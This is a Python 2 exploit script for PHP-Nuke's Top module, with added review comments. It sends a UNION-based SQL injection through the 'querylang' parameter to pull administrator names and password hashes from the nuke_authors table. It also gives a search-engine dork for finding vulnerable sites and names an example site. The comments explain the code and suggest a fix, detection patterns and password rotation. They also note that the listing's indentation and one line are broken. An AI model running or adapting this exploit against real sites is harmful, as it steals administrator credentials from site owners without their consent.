#!/usr/bin/python
#baltazar
#PHP-NUKE
#b4ltazar[at]gmail[dot]com
import sys,time,re, urllib2
# Python 2 script (print statements, urllib2). Indentation was lost when this
# listing was extracted, so the nesting described in the comments below is
# inferred from statement order -- confirm against an original copy.
#
# What it does: sends one HTTP GET per entry in `sql` to the host given on the
# command line and prints any run of 32 lowercase hex characters found in the
# response body.
print "\n\t b4ltazar[at]gmail[dot]com"
print "\t"
# Single request path. URL-decoded, the `querylang` parameter carries
#   " WHERE 1=1 UNION ALL SELECT 0,pwd,aid,0 FROM nuke_authors--"
# i.e. the columns `pwd` and `aid` of table `nuke_authors`.
# NOTE(review): the server-side code is not shown here; presumably the Top
# module places `querylang` into its SQL statement unescaped. The fix belongs
# there: validate or parameterise `querylang` instead of concatenating it.
# Detection: access-log entries for modules.php with name=Top and a
# `querylang` value containing UNION / SELECT / nuke_authors.
sql = ["modules.php?name=Top&querylang=%20WHERE%201=1%20UNION+ALL%20SELECT%200,pwd,aid,0%20FROM%20nuke_authors--"]
# Exactly one command-line argument is required; otherwise the usage text is
# printed and the script exits with status 1 (presumably all of the following
# prints and sys.exit sit inside this `if`).
# NOTE(review): the next two lines are an extraction artifact -- one string
# literal is split across a line break and two print statements are fused on
# the second line, so the listing does not parse as shown.
if len(sys.argv) !=2:
print "\nUsage: python php-nuke.py <<site>>"
print "\nExamle: python php-nuke.py
www.impactlab.com" print "\nDork: allinurl:modules.php?name=Top"
sys.exit(1)
# Normalise the argument into a base URL: drop "/index.php", make sure it ends
# with "/", and prepend "http://" when the first seven characters differ.
host = sys.argv[1].replace("/index.php" ,"")
if host[-1] != "/":
host = host +"/"
if host[:7] != "http://":
host = "http://"+host
print "\n[+] Site:" ,host
print "[+] SQL Loaded..."
print "[+] Starting Scan...\n"
# The loop variable reuses the name `sql`, so after the loop `sql` is the last
# path string rather than the list.
for sql in sql:
# Fixed 3-second pause before each request.
time.sleep(3)
print "[+] Trying:" ,host+sql.replace("\n", "")
try:
# Plain GET of base URL + path; the whole response body is read into memory.
source = urllib2.urlopen(host+sql.replace("\n", "")).read()
# "[a-f0-9]"*32 expands to a pattern of 32 consecutive lowercase hex
# characters. It matches any such run in the page, so the hits are MD5-shaped
# strings, not verified password hashes.
# NOTE(review): if these are values from nuke_authors.pwd, the affected
# administrator passwords should be treated as exposed and rotated.
md5s = re.findall("[a-f0-9]"*32,source)
if len(md5s) >=1:
print "[!]" ,host+sql.replace("\n", "")
for md5 in md5s:
print "\n[+]MD5:" ,md5
# Only urllib2.HTTPError is swallowed; any other exception raised by urlopen
# or read() propagates and ends the script.
except(urllib2.HTTPError):
pass
print "\n[-] Exploit finished\n"